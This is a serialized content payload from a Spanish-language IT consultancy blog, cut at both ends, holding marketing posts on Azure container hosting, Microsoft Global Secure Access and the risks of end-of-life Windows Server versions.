hay una lista de las opciones de alojamiento de contenedores en Azure, desde Light hasta Full Managed:",[1255,3128,3129,3137,3144,3151],{},[1258,3130,3131],{},[2630,3132,3136],{"href":3133,"rel":3134},"https://learn.microsoft.com/es-es/azure/aks/what-is-aks",[3135],"nofollow","Azure Kubernetes Services (AKS)",[1258,3138,3139],{},[2630,3140,3143],{"href":3141,"rel":3142},"https://learn.microsoft.com/es-es/azure/container-instances/container-instances-overview",[3135],"Azure Container Instances (ACI)",[1258,3145,3146],{},[2630,3147,3150],{"href":3148,"rel":3149},"https://azure.microsoft.com/es-es/products/app-service/containers/?activetab=pivot:deploytab",[3135],"Azure WebApp for Containers",[1258,3152,3153],{},[2630,3154,3157],{"href":3155,"rel":3156},"https://learn.microsoft.com/es-es/azure/container-apps/overview",[3135],"Azure Container Apps (ACA)",[12,3159,3160],{},"Cada uno de estos servicios ofrece sus propias ventajas en función del caso de uso previsto.",[12,3162,3163],{},"Azure Container Registry (ACR) permite el almacenamiento centralizado de contenedores en su propio entorno Azure y ofrece una solución integrada para utilizar ACR como fuente de las imágenes de contenedor utilizadas.",[41,3165,3167],{"id":3166},"destacado-azure-container-apps","Destacado: Azure Container Apps",[12,3169,31],{},[12,3171,3172],{},"La más reciente opción de alojamiento de contenedores de Microsoft es Azure Container Apps (ACA). A diferencia de AKS, Microsoft gestiona por completo los Kubernetes subyacentes, incluidas las actualizaciones y el escalado.",[12,3174,3175],{},[2772,3176],{"alt":3177,"src":3178},"Container Apps Basic","https://res.cloudinary.com/c4a8/image/upload/v1720794093/blog/pics/azure-container-apps-example-scenarios.png",[12,3180,3181],{},"Como base sirve un Azure Container App Environment, en el que Microsoft proporciona recursos Kubernetes totalmente gestionados que pueden ser utilizados por las aplicaciones. Los distintos perfiles de carga de trabajo ofrecen diversas combinaciones de CPU/RAM y también el uso de sistemas GPU.",[12,3183,3184],{},"La principal ventaja de esta solución es que el usuario puede centrarse únicamente en su aplicación y su configuración específica, sin tener que gestionar el clúster.",[12,3186,3187],{},"ACA ofrece diversas formas de conectar fácilmente las aplicaciones con otros servicios de Azure. Por ejemplo, FileShares de una cuenta de almacenamiento Azure puede integrarse en sus contenedores para asegurar datos persistentes entre reinicios o cambios de versión de la aplicación.",[12,3189,3190],{},"Otra característica de ACA son las pruebas A/B o Green/Blue, en las que se ejecutan simultáneamente dos versiones de una aplicación. El tráfico entrante se divide entre las instancias en ejecución, lo que permite conocer rápidamente la fase actual de desarrollo y corregir errores de inmediato.",[41,3192,3194],{"id":3193},"ejemplo-práctico-github-runner-en-azure-container-apps","Ejemplo práctico: GitHub Runner en Azure Container Apps",[12,3196,31],{},[12,3198,3199],{},"Un ejemplo práctico: los workflows CI/CD requieren un entorno en el que puedan ejecutarse. GitHub, Azure DevOps y otros proveedores ponen a disposición agentes públicos en los que se pueden ejecutar los workflows. Estos runners son gestionados por GitHub y se comunican a través de endpoints públicos. Sin embargo, si necesitas acceso a recursos internos o no quieres trabajar en sistemas públicos, estos runners también pueden funcionar en tu propia red.",[12,3201,3202],{},[2772,3203],{"alt":3204,"src":3205},"GitHub Workflow Classic","https://res.cloudinary.com/c4a8/image/upload/v1720794093/blog/pics/azure-workflow-basic.png",[12,3207,3208,3209,3214],{},"Tradicionalmente, para ello se utilizaban máquinas virtuales que funcionaban 24 horas al día, 7 días a la semana. Azure Container Apps ofrece una alternativa rentable y escalable. Mediante el uso de KEDA (",[2630,3210,3213],{"href":3211,"rel":3212},"https://keda.sh/",[3135],"Kubernetes Event Driven Autoscaler","), se establece una conexión con su propio entorno de GitHub. ACA supervisa si se ha iniciado un workflow, inicia un contenedor para ejecutar el workflow y, a continuación, lo elimina de nuevo. Si no se está ejecutando ningún workflow, no se inicia ningún contenedor, lo que mantiene los costes bajos.",[12,3216,3217],{},[2772,3218],{"alt":3219,"src":3220},"GitHub Workflow with Container Apps","https://res.cloudinary.com/c4a8/image/upload/v1720794093/blog/pics/azure-workflow-container-app.png",[12,3222,3223],{},"La escalabilidad de la solución es otra ventaja, ya que se crea una instancia de contenedor independiente para cada workflow. En comparación con una máquina virtual, en la que normalmente solo un agente atiende un workflow, esto ofrece una alternativa flexible y eficiente.",[41,3225,3227],{"id":3226},"resumen","Resumen",[12,3229,31],{},[12,3231,3232],{},"Los contenedores ofrecen una excelente oportunidad para modernizar su propio desarrollo y despliegue de aplicaciones. Microsoft Azure, con su completa cartera de servicios, ofrece la solución adecuada, tanto si desea gestionarla usted mismo como si desea centrarse por completo en su aplicación.",{"title":65,"searchDepth":111,"depth":111,"links":3234},[3235,3236,3237,3238],{"id":3117,"depth":111,"text":3118},{"id":3166,"depth":111,"text":3167},{"id":3193,"depth":111,"text":3194},{"id":3226,"depth":111,"text":3227},{"lang":2170,"seoTitle":3240,"titleClass":2172,"date":3241,"categories":3242,"blogtitlepic":3244,"socialimg":3245,"customExcerpt":3246,"keywords":3247,"contactInContent":3248,"hreflang":3270,"scripts":3275},"Optimización del despliegue en la nube: Soluciones de contenedores en Azure al detalle","2024-07-15",[3243],"Azure","head-containers-on-azure","/blog/heads/head-containers-on-azure.jpg","Más rápida, más ágil, más eficiente: la tecnología de contenedores está transformando la forma en que las empresas desarrollan y despliegan software. Obtenga más información sobre cómo Microsoft Azure sirve como plataforma líder para alojar contenedores y cómo puede mejorar significativamente la agilidad y escalabilidad de sus aplicaciones.","Azure Container Solutions, Microsoft Azure, Container Technology, CI/CD Integration, Kubernetes Management, Application Deployment, Cloud Services, Software Development, Scalable Infrastructure, DevOps Tools",{"quote":2167,"infos":3249},{"bgColor":2990,"color":2991,"boxBgColor":2992,"boxColor":2993,"headline":2918,"subline":3250,"level":41,"textStyling":2203,"flush":2204,"person":3251,"form":3259},"¿Desea obtener más información sobre los contenedores en Azure? Estaremos encantados de presentarle personalmente nuestro enfoque y apoyarle con nuestra experiencia en la implantación de soluciones de contenedores. Estaremos encantados de atenderle.",{"image":3252,"cloudinary":2180,"alt":3253,"name":3254,"quotee":2499,"details":3255},"/people/team-spain.jpg","Juan Jose Fernandez Perez, Kim Paschke & Christian Segor","Nuestro equipo español",[3256,3257],{"text":2927,"href":2928,"details":2929,"icon":2815},{"text":2806,"href":3258,"icon":2819},"mailto:sales@glueckkanja.com",{"ctaText":2212,"cta":3260,"method":2168,"action":2215,"fields":3261},{"skin":2214},[3262,3263,3264,3265,3266,3268,3269],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":2825},{"label":2936,"type":61,"id":2223,"required":2180,"requiredMsg":2827},{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":2830},{"label":2939,"type":2236,"id":2237,"required":2180,"requiredMsg":2940},{"type":2240,"id":2246,"value":3267},"Solicitud de soluciones de contenedores",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},[3271,3273],{"lang":2260,"href":3272},"/blog/azure/2024/07/containers-on-azure",{"lang":2257,"href":3274},"/blog/azure/2024/07/containers-on-azure-en",{"slick":2180,"form":2180},"/posts/2024-07-12-containers-on-azure",{"title":3102,"description":3108},"posts/2024-07-12-containers-on-azure",[3243,3280,3281,3282],"Cloud Technology","Development","CI/CD-Workflow","G-3Szptoy4wXnuxdj9d3MSSR7oRXO4NTZHZG4a-ZOdw",{"id":3285,"title":3286,"author":3287,"body":3288,"cta":2165,"description":3402,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":3403,"moment":3405,"navigation":2180,"path":3435,"seo":3436,"stem":3437,"tags":3438,"webcast":2167,"__hash__":3441},"content_es/posts/2024-07-18-gsa-launch-partner.md","glueckkanja es partner de lanzamiento de SSE de Microsoft",[2372],{"type":9,"value":3289,"toc":3397},[3290,3299,3307,3310,3313,3316,3320,3322,3325,3331,3334,3348,3352,3354,3357,3360,3368,3374,3377,3380,3388,3392,3394],[12,3291,3292,3293,3298],{},"glueckkanja ha sido anunciado como uno de los ",[2630,3294,3297],{"href":3295,"rel":3296},"https://learn.microsoft.com/es-es/entra/global-secure-access/how-to-find-microsoft-services-partners",[3135],"‘Product Launch Partners’"," para la solución Security Service Edge (SSE) de Microsoft, Global Secure Access, que incluye Microsoft Entra Internet & Private Access.",[12,3300,3301,3302,3306],{},"Con muchos años de experiencia en un enfoque 100% basado en la nube, ofrecemos un amplio apoyo en la implementación de un diseño consistente de Zero Trust, y ",[2630,3303,3305],{"href":3304},"/es/security/global-secure-access/","Global Secure Access"," encaja perfectamente en esta estrategia. Ahora es un componente clave de nuestro plan de seguridad moderno, centrado en el lugar de trabajo y la identidad, desde la prueba de concepto hasta los servicios gestionados.",[12,3308,3309],{},"Llevamos años trabajando en proyectos relacionados con el lugar de trabajo y la seguridad, separando con éxito a los clientes del centro de datos y desplegando clientes gestionados en la nube de manera altamente eficiente y segura. Sin embargo, un cliente moderno 100% en la nube no elimina automáticamente los entornos heredados; aún necesita acceder a servicios dentro de ellos. Además, muchos equipos de seguridad creen que las capacidades de seguridad son necesarias más allá del cliente, dentro de la pila de red.",[12,3311,3312],{},"Lamentablemente, en muchos proyectos, observamos que nuestros clientes de Future Workplace estaban siendo integrados en los entornos del centro de datos utilizando soluciones VPN obsoletas, y varias soluciones de 'Zero Trust' estaban obstruyendo el tráfico entre los clientes y Microsoft 365.",[12,3314,3315],{},"Por lo tanto, estamos muy satisfechos de poder utilizar a partir de ahora Entra Private Access, un verdadero acceso a la red Zero Trust centrado en la identidad para los entornos de centros de datos más complejos, como reemplazo de las soluciones VPN. Además, también utilizaremos en nuestros proyectos Entra Internet Access, una solución Secure Web Gateway centrada en la identidad con integración de acceso condicional.",[41,3317,3319],{"id":3318},"qué-es-global-secure-access","¿Qué es Global Secure Access?",[12,3321,31],{},[12,3323,3324],{},"Global Secure Access está diseñado para ofrecer servicios de seguridad a través de la nube, brindando soporte a dispositivos gestionados en todas las plataformas principales. Esto incluye la integración con proveedores de identidad y herramientas de seguridad como XDR o SIEM.",[12,3326,3327],{},[2772,3328],{"alt":3329,"src":3330},"GSA Architecture","https://res.cloudinary.com/c4a8/image/upload/v1721295305/blog/pics/gsa-architecture.png",[12,3332,3333],{},"La arquitectura de la solución SSE se divide en dos áreas principales, cada una con componentes diferentes:",[1255,3335,3336,3342],{},[1258,3337,3338,3341],{},[251,3339,3340],{},"Internet Access"," cuenta con un Secure Web Gateway (SWG) centrado en la identidad que funciona de forma similar a un proxy de reenvío. No sólo protege contra malware y otras amenazas, sino que también realiza filtrado de categorías de URL.",[1258,3343,3344,3347],{},[251,3345,3346],{},"Private Access"," es una solución Zero Trust Network Access (ZTNA) centrada en la identidad que permite un acceso granular y consistente a aplicaciones no públicas independientemente de su ubicación, implementando un control de acceso detallado basado en el contexto.",[41,3349,3351],{"id":3350},"cuál-es-la-diferencia-entre-global-secure-access-y-mi-pasarela-vpn-proxy","¿Cuál es la diferencia entre Global Secure Access y mi pasarela VPN / proxy?",[12,3353,31],{},[12,3355,3356],{},"Tanto Entra Internet Access como Entra Private Access cuentan con integración de Acceso Condicional, lo que permite una autenticación fuerte y la aplicación de la conformidad del dispositivo, incluyendo la integración con Microsoft Defender para Endpoint, en la capa de autenticación. Microsoft también está trabajando en mecanismos adicionales de aplicación en la capa de datos mediante la Evaluación Continua de Acceso para abordar escenarios avanzados de robo de tokens.",[12,3358,3359],{},"Incluso las pasarelas VPN más recientes suelen cubrir la autenticación inicial del usuario a través de RADIUS o SAML, concediendo acceso al entorno - a menudo durante un periodo exento - independientemente de si el usuario o el cliente se ven implicados en un incidente de seguridad. Este acceso autenticado una sola vez se aplica generalmente a toda la red interna, con el mismo conjunto de normas aplicables a todos los usuarios.",[2109,3361,3362],{},[12,3363,3364,3367],{},[251,3365,3366],{},"Entra Private Access"," está diseñado para combinar segmentos de red individuales en Enterprise Apps y, a continuación, asignar, autenticar y restringir individualmente a los usuarios con Conditional Access.",[12,3369,3370],{},[2772,3371],{"alt":3372,"src":3373},"Full Tunnel vs App based Tunnel","https://res.cloudinary.com/c4a8/image/upload/v1721295307/blog/pics/tunnel-comparison.png",[12,3375,3376],{},"Según mi experiencia, el principal problema de las pasarelas web seguras es la mala integración con los proveedores de identidad. Mientras que las primeras versiones pusieron de rodillas a las granjas de ADFS con extensas solicitudes SAML y causaron interrupciones masivas, ahora los proveedores han pasado a la autenticación única y luego trabajan con sus propias cookies de larga duración.",[12,3378,3379],{},"El segundo gran problema es la exclusión de URLs e IPs de Microsoft del conjunto de reglas del proxy. Esto simplemente no necesita un proxy entre el cliente y los servicios de confianza como M365, lo que de hecho conduce a diversos problemas y degradación del rendimiento. Todavía tengo que ver un proveedor en el que esto funcione sin fallos.",[2109,3381,3382],{},[12,3383,3384,3387],{},[251,3385,3386],{},"Entra Internet Access"," forma parte de la mayoría de los proveedores de identidad en la nube para empresas y cuenta con una integración de acceso condicional muy sólida.",[41,3389,3391],{"id":3390},"quieres-saber-más","¿Quieres saber más?",[12,3393,31],{},[12,3395,3396],{},"Contamos con una amplia experiencia en los ámbitos de la identidad, la seguridad, el lugar de trabajo y la red. Con Global Secure Access, unimos todos estos aspectos. Despídete de las anticuadas soluciones VPN y proxy web y aprovecha al máximo las posibilidades de la solución SSE de Microsoft. Estaremos encantados de atenderte.",{"title":65,"searchDepth":111,"depth":111,"links":3398},[3399,3400,3401],{"id":3318,"depth":111,"text":3319},{"id":3350,"depth":111,"text":3351},{"id":3390,"depth":111,"text":3391},"glueckkanja ha sido anunciado como uno de los ‘Product Launch Partners’ para la solución Security Service Edge (SSE) de Microsoft, Global Secure Access, que incluye Microsoft Entra Internet & Private Access.",{"lang":2170,"seoTitle":3404,"titleClass":2172,"date":3405,"categories":3406,"blogtitlepic":3407,"socialimg":3408,"customExcerpt":3409,"keywords":3410,"contactInContent":3411,"hreflang":3429,"scripts":3434},"glueckkanja es partner de lanzamiento de producto para la solución Security Service Edge (SSE) de Microsoft","2024-07-18",[2175],"head-global-secure-access","/blog/heads/head-global-secure-access.jpg","Estamos encantados de anunciar nuestro papel como ‘Parner de Lanzamiento de Producto’ de la solución Security Service Edge (SSE) de Microsoft, Global Secure Access, que incluye Microsoft Entra Internet & Private Access. Nuestra colaboración con Microsoft en varias vistas previas privadas ha perfeccionado estas características para beneficiar no sólo a nuestros equipos, sino también a nuestros clientes, integrando sus necesidades en una experiencia en la nube segura y sin inconvenientes. Descubre cómo nuestra experiencia en un enfoque 100% basado en la nube y el diseño Zero Trust están transformando el modern workplace y la seguridad centrada en la identidad.","Global Secure Access, SSE, Microsofts SSE, Private Access, Internet Access, VPN replacement, Zero Trust Network Access, Network security",{"quote":2167,"infos":3412},{"bgColor":2990,"color":2991,"boxBgColor":2992,"boxColor":2993,"headline":2918,"subline":3413,"level":41,"textStyling":2203,"flush":2204,"person":3414,"form":3418},"¿Deseas obtener más información sobre la solución SSE de Microsoft? Estaremos encantados de presentarte personalmente nuestro enfoque y apoyarte con nuestra experiencia durante la implantación. Estaremos encantados de atenderte.",{"image":3252,"cloudinary":2180,"alt":3253,"name":3254,"quotee":2499,"details":3415},[3416,3417],{"text":2927,"href":2928,"details":2929,"icon":2815},{"text":2806,"href":3258,"icon":2819},{"ctaText":2212,"cta":3419,"method":2168,"action":2215,"fields":3420},{"skin":2214},[3421,3422,3423,3424,3425,3427,3428],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":2825},{"label":2936,"type":61,"id":2223,"required":2180,"requiredMsg":2827},{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":2830},{"label":2939,"type":2236,"id":2237,"required":2180,"requiredMsg":2940},{"type":2240,"id":2246,"value":3426},"Consulta Global Secure Access",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},[3430,3432],{"lang":2260,"href":3431},"/blog/security/2024/07/gsa-launch-partner",{"lang":2257,"href":3433},"/blog/security/2024/07/gsa-launch-partner-en",{"slick":2180,"form":2180},"/posts/2024-07-18-gsa-launch-partner",{"title":3286,"description":3402},"posts/2024-07-18-gsa-launch-partner",[3305,3439,3440,2175],"Zero Trust","VPN Replacement","8DjrA18s1FR2OuZNI3ZEntykApjx1hA4EB2Ak6Mmquo",{"id":3443,"title":3444,"author":3445,"body":3446,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":3733,"moment":3734,"navigation":2180,"path":3764,"seo":3765,"stem":3766,"tags":3767,"webcast":2167,"__hash__":3773},"content_es/posts/2024-10-17-end-of-support-operating-systems.md","Por qué los servidores Windows obsoletos ponen en peligro tu empresa",[2514],{"type":9,"value":3447,"toc":3721},[3448,3452,3454,3457,3460,3464,3466,3472,3478,3481,3489,3493,3495,3498,3511,3514,3517,3520,3524,3526,3530,3532,3535,3544,3550,3554,3556,3559,3562,3573,3579,3585,3591,3595,3597,3602,3605,3612,3620,3624,3626,3629,3632,3635,3638,3642,3644,3647,3650,3700,3706,3709,3712,3715],[41,3449,3451],{"id":3450},"servidor-windows-vs-avión","Servidor Windows vs avión",[12,3453,31],{},[12,3455,3456],{},"Imagina subir a un avión que lleva mucho tiempo fuera de servicio y que tiene más de 35 problemas técnicos críticos. ¿Te sentirías seguro? Ahora piensa en tu Windows Server 2012 R2. Es básicamente como ese avión anticuado: lleno de vulnerabilidades, pero esta vez está en juego la infraestructura de tu empresa.",[12,3458,3459],{},"Es hora de actuar: no pierdas tiempo. Tu vuelo está reservado, pero está seriamente en riesgo.",[41,3461,3463],{"id":3462},"comprende-las-implicaciones-de-seguridad-y-los-posibles-impactos","Comprende las implicaciones de seguridad y los posibles impactos",[12,3465,31],{},[12,3467,3468,3471],{},[251,3469,3470],{},"Impacto en el Security ScoreCard:"," los sistemas que se encuentran en end-of-life (EOL) afectan significativamente tu Security ScoreCard.",[12,3473,3474,3477],{},[251,3475,3476],{},"Riesgo masivo:"," estos sistemas son extremadamente vulnerables a ataques debido a la falta de actualizaciones y soporte del fabricante, y representan una grave amenaza para toda la red de la empresa.",[12,3479,3480],{},"A los atacantes les encantan los sistemas operativos EOL, ya que son invitaciones abiertas para infiltrarse en tu red, lo que puede llevar a una completa compromisión de la infraestructura.",[12,3482,3483,3484,3488],{},"Aunque nuestros ",[2630,3485,3487],{"href":3486},"/es/security/are-you-under-attack/","servicios de respuesta APT"," (en casos de emergencia) pueden ayudarte en la recuperación, siempre recomendamos un enfoque proactivo, para evitar que se llegue a esa situación.",[41,3490,3492],{"id":3491},"identifica-los-sistemas-eol-en-tu-organización","Identifica los sistemas EOL en tu organización",[12,3494,31],{},[12,3496,3497],{},"Descubrimiento y métodos para identificar sistemas operativos EOL",[12,3499,3500,3501,3505,3506,3510],{},"Empieza con el descubrimiento. Con frecuencia detectamos sistemas operativos EOL durante nuestras evaluaciones, ya sea a través de ",[2630,3502,3504],{"href":3503},"/es/security/preventive-services/","servicios preventivos"," como AD/EID o de nuestras ",[2630,3507,3509],{"href":3508},"/es/security/cloud-security-operations-center/","ofertas de CSOC"," (Cloud Security Operation Center) gestionado. El primer paso para abordar este problema es desarrollar métodos confiables para identificar sistemas EOL y tomar medidas.\nEs crucial establecer una estrategia para identificar regularmente estos sistemas obsoletos mediante diversas herramientas y evaluaciones. Podemos colaborar contigo para implementar esto de manera efectiva.",[12,3512,3513],{},"Un paso clave es identificar tus aplicaciones de line of business (LOB) y determinar dónde se están ejecutando para asegurar que estén alineadas con las necesidades de tu empresa. El triángulo LOB basado en riesgos es una herramienta valiosa que ayuda a descubrir dependencias y evaluar riesgos en toda la organización.",[12,3515,3516],{},"Al analizar los patrones de pérdidas y la volatilidad a lo largo del tiempo, este enfoque se convierte en una piedra angular de la gestión eficaz de riesgos, proporcionando información esencial a tu equipo directivo. Esto es especialmente crítico cuando las LOBs súper sensibles, ubicadas en la cima del triángulo, operan en sistemas EOL. Estos sistemas representan una amenaza significativa para la continuidad del servicio, la estabilidad operativa y el rendimiento general de la empresa.",[12,3518,3519],{},"En resumen, si tus LOBs más críticos operan en sistemas EOL, estás exponiendo a tu empresa al riesgo de interrupciones en el servicio y a peligros operativos elevados.",[41,3521,3523],{"id":3522},"construir-una-estrategia-de-sistema-operativo-anticuada","Construir una estrategia de sistema operativo anticuada",[12,3525,31],{},[186,3527,3529],{"id":3528},"solución-a-corto-plazo-la-esu-podría-ser-la-solución","Solución a corto plazo: la ESU podría ser la solución",[12,3531,47],{},[12,3533,3534],{},"Protégete con una solución a corto plazo mientras desarrollas una estrategia a largo plazo para gestionar los sistemas EOL y end-of-support (EOS).",[12,3536,3537,3538,3543],{},"Utiliza las ",[2630,3539,3542],{"href":3540,"rel":3541},"https://www.microsoft.com/en-us/windows-server/extended-security-updates",[3135],"Extended Security Updates (ESU)"," como una salvación para superar este período desafiante. Las ESU pueden proteger temporalmente los sistemas EOL hasta que se complete la migración o el desmantelamiento. Recuerda que se trata de una solución a corto plazo.",[12,3545,3546,3549],{},[251,3547,3548],{},"Aislamiento:"," Aísla completamente estos sistemas de las redes y de Active Directory durante el período de transición. Esto te brinda el tiempo necesario para planificar y ejecutar tu migración sin exponerte a riesgos graves, creando una situación más controlable.",[186,3551,3553],{"id":3552},"crear-una-estrategia-a-largo-plazo","Crear una estrategia a largo plazo",[12,3555,47],{},[12,3557,3558],{},"Después de abordar las preocupaciones inmediatas con las ESU, es momento de cambiar el enfoque hacia una estrategia a largo plazo para eliminar los sistemas legados. Tómate un momento para evaluar las mejores soluciones a largo plazo que se alineen con tus necesidades.",[12,3560,3561],{},"Considera la posibilidad de migrar a sistemas operativos modernos, enfoques sin servidor, Software como Servicio (SaaS) o cualquier solución nativa de la nube que se adapte a tu entorno.",[12,3563,3564,3567,3568,3572],{},[251,3565,3566],{},"Migración:"," Planifica y ejecuta la actualización de los sistemas obsoletos a las versiones más recientes. Evalúa alternativas como el enfoque sin servidor, contenedores o Kubernetes (K8s). El ",[2630,3569,3571],{"href":3570},"/en/azure/migrate-to-the-cloud","Azure Foundation Blueprint"," de glueckkanja ofrece un marco sólido para tu migración a la nube. Utilizando el despliegue como infraestructura como código, aseguramos una implementación rápida con la máxima calidad. Los requisitos de seguridad y gobernanza están integrados directamente en la plataforma, y los controles incorporados, como las políticas y la automatización, sustituyen a los procesos y flujos de trabajo obsoletos y costosos.",[12,3574,3575,3578],{},[251,3576,3577],{},"Desmantelamiento:"," Desmantela de forma segura los sistemas sin soporte. Al seguir este enfoque, mitigas los riesgos inmediatos mientras planificas mejoras de seguridad sostenibles a largo plazo. Si necesitas más detalles o asistencia, no dudes en contactarnos.",[12,3580,3581,3584],{},[251,3582,3583],{},"Objetivo a largo plazo:"," En el futuro, asegúrate de estar preparado con suficiente anticipación antes de que tus sistemas lleguen al EOL.",[12,3586,3587,3590],{},[251,3588,3589],{},"Contacta con nuestros expertos en Azure:"," Planifica y ejecuta una migración a la nube exitosa con nuestra orientación. Glueckkanja cuenta con la especialización avanzada de Azure para la migración de infraestructuras y bases de datos. Los clientes también pueden aprovechar el Programa de Migración y Modernización de Azure (AMM) para obtener un soporte integral en la migración.",[41,3592,3594],{"id":3593},"conoce-el-ciclo-de-vida-del-soporte-del-sistema-operativo","Conoce el ciclo de vida del soporte del sistema operativo",[12,3596,31],{},[12,3598,3599],{},[251,3600,3601],{},"Revisa periódicamente el ciclo de vida del soporte y los plazos de cada sistema operativo (SO) para garantizar el cumplimiento y gestionar los riesgos de manera proactiva.",[12,3603,3604],{},"Microsoft proporciona directrices consistentes y predecibles para sus productos, ya sea el sistema operativo de servidor, el sistema operativo de cliente u otros productos como Exchange, SQL y muchos más.",[12,3606,3607,3608,1014],{},"Esto permite una planificación estratégica para el futuro. Mantente siempre informado sobre el ciclo de vida de soporte del sistema operativo y el soporte de software. Las revisiones periódicas te ayudan a cumplir las normativas y a gestionar los riesgos de forma proactiva. Con Defender for Endpoint, estas revisiones se simplifican. Monitorear vulnerabilidades e identificar sistemas EOL son partes integrales de nuestro ",[2630,3609,3611],{"href":3610},"/en/security/cloud-security-operations-center","servicio CSOC",[12,3613,3614,3615],{},"Obtén una visión general de la Política de ",[2630,3616,3619],{"href":3617,"rel":3618},"https://learn.microsoft.com/en-us/lifecycle/",[3135],"Ciclo de Vida de Microsoft.",[41,3621,3623],{"id":3622},"conclusión-no-esperes-a-que-la-prensa-escriba-tu-historia","Conclusión: No esperes a que la prensa escriba tu historia",[12,3625,31],{},[12,3627,3628],{},"El mensaje es alto y claro: no esperes a que se produzcan interrupciones del servicio o compromisos.\nEsperamos ver solo noticias positivas sobre tu empresa en la prensa. Aunque ofrecemos servicios de respuesta a APT, te animamos encarecidamente a ti —y a todos nuestros clientes— a que te pongas en contacto con nosotros de forma proactiva, en lugar de reaccionar ante una brecha de seguridad.",[12,3630,3631],{},"La esencia de este artículo es instarte a que cambies de una postura reactiva a la preparación de tu negocio para el siguiente nivel. Prepara tu organización para el futuro manteniendo las plataformas actualizadas o adoptando soluciones nativas en la nube. Todas las partes interesadas, incluidos tus clientes y directivos, apreciarán este enfoque proactivo.",[12,3633,3634],{},"La dirección empresarial, en particular, debe ser plenamente consciente de sus responsabilidades y obligaciones para garantizar la estabilidad operativa y la seguridad de la empresa.",[12,3636,3637],{},"Aprovecha nuestras soluciones de Azure, Workplace y Seguridad: ¡no dudes en ponerte en contacto con nosotros!",[41,3639,3641],{"id":3640},"apéndice-windows-server-2012-r2-windows-server-2008-r2-número-de-vulnerabilidades","Apéndice - Windows Server 2012 R2 - Windows Server 2008 R2 - Número de Vulnerabilidades",[12,3643,31],{},[12,3645,3646],{},"La tabla a continuación destaca las vulnerabilidades conocidas, que continúan aumentando en más de 20 cada mes.",[2126,3648,3649],{},"\ntable {\n font-family: arial, sans-serif;\n border-collapse: collapse;\n width: 100%;\n}\n\ntd, th {\n border: 1px solid #dddddd;\n text-align: left;\n padding: 8px;\n}\n\ntr:nth-child(even) {\n background-color: #dddddd;\n}\n",[417,3651,420,3652],{},[438,3653,3654,420,3665,420,3677,420,3689],{},[426,3655,424,3656,424,3659,424,3662,420],{},[430,3657,3658],{},"Operating System",[430,3660,3661],{},"Windows Server 2012 R2",[430,3663,3664],{},"Windows Server 2008 R2",[426,3666,424,3667,424,3670,424,3674,420],{},[443,3668,3669],{},"Total # of Vulnerabilities*",[443,3671,3673],{"style":3672},"text-align: center;","1.142",[443,3675,3676],{"style":3672},"2.240",[426,3678,424,3679,424,3682,424,3686,420],{},[443,3680,3681],{},"Critical",[443,3683,3685],{"style":3684},"text-align: center; color: red;","35",[443,3687,3688],{"style":3684},"47",[426,3690,424,3691,424,3694,424,3697,420],{},[443,3692,3693],{},"High",[443,3695,3696],{"style":3672},"806",[443,3698,3699],{"style":3672},"1.457",[12,3701,3702],{},[3703,3704,3705],"small",{},"Datos hasta septiembre de 2024, con un número creciente de vulnerabilidades mes a mes.",[12,3707,3708],{},"En septiembre de 2024, Windows Server 2012 R2 presenta 1,142 vulnerabilidades (ver punto 1) que permanecen sin abordar o sin parches. Este número sigue creciendo mes a mes, con 35 clasificadas como críticas y 806 como de alta severidad (ver punto 2).",[12,3710,3711],{},"La situación es aún más preocupante para Windows Server 2008 R2, que cuenta con un número aún mayor de vulnerabilidades conocidas. Esto crea una oportunidad tentadora para los atacantes, ofreciéndoles un camino claro hacia posibles compromisos.",[12,3713,3714],{},"Estos datos provienen de Microsoft Defender for Endpoint, que proporciona una visión integral y valiosos conocimientos sobre las vulnerabilidades del sistema.",[12,3716,3717],{},[2772,3718],{"alt":3719,"src":3720},"Microsoft Defender for Endpoint Vulnerabilities","https://res.cloudinary.com/c4a8/image/upload/blog/pics/defender-portal-vulnerabilites.png",{"title":65,"searchDepth":111,"depth":111,"links":3722},[3723,3724,3725,3726,3730,3731,3732],{"id":3450,"depth":111,"text":3451},{"id":3462,"depth":111,"text":3463},{"id":3491,"depth":111,"text":3492},{"id":3522,"depth":111,"text":3523,"children":3727},[3728,3729],{"id":3528,"depth":329,"text":3529},{"id":3552,"depth":329,"text":3553},{"id":3593,"depth":111,"text":3594},{"id":3622,"depth":111,"text":3623},{"id":3640,"depth":111,"text":3641},{"lang":2170,"seoTitle":3444,"titleClass":2172,"date":3734,"categories":3735,"blogtitlepic":3736,"socialimg":3737,"customExcerpt":3738,"keywords":3410,"contactInContent":3739,"hreflang":3758,"scripts":3763},"2024-10-17",[2175],"head-end-of-support","/blog/heads/head-end-of-support.jpg","¿Confiarías en un avión con defectos críticos para llegar sano y salvo a tu destino? Entonces, ¿por qué confiar en tu Windows Server 2012 R2 cuando se trata de la seguridad de tu organización? Con más de 35 vulnerabilidades críticas, los sistemas obsoletos podrían ser el mayor riesgo para tu organización. Aprende cómo proteger tu infraestructura antes de que sea demasiado tarde, porque en el panorama actual de amenazas no hay margen para el error.",{"quote":2167,"infos":3740},{"bgColor":3741,"color":2993,"boxBgColor":3742,"boxColor":2991,"headline":2918,"subline":3743,"level":41,"textStyling":2203,"flush":2204,"person":3744,"form":3748},"var(--color-gigas)","var(--color-yellow)","¿Le gustaría saber más sobre los sistemas End-of-Life (EOL) y End-of-Support (EOS)? ¡No dude en contactarnos! ¡Esperamos su 